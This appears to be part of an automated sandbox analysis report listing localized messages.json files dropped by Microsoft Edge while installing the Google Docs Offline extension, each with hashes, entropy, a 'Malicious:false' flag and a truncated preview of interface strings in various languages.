                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\lo\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2535
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                                                        MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                                                        SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                                                        SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                                                        SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\lt\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1028
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                                                        MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                                                        SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                                                        SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                                                        SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\lv\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):994
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                                                        MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                                                        SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                                                        SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                                                        SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\ml\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2091
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                                                        MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                                                        SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                                                        SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                                                        SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\mn\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2778
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                                                        MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                                                        SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                                                        SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                                                        SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\mr\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1719
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                                                        MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                                                        SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                                                        SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                                                        SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\ms\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):936
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                                                        MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                                                        SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                                                        SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                                                        SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\my\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):3830
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                                                        MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                                                        SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                                                        SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                                                        SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\ne\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1898
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                                                        MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                                                        SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                                                        SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                                                        SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\nl\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):914
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                                                        MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                                                        SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                                                        SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                                                        SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\nn\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):851
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                        MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                        SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                        SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                        SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\no\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):878
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                                                        MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                                                        SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                                                        SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                                                        SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\pa\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2766
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                                                        MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                                                        SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                                                        SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                                                        SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                                                        Malicious:false
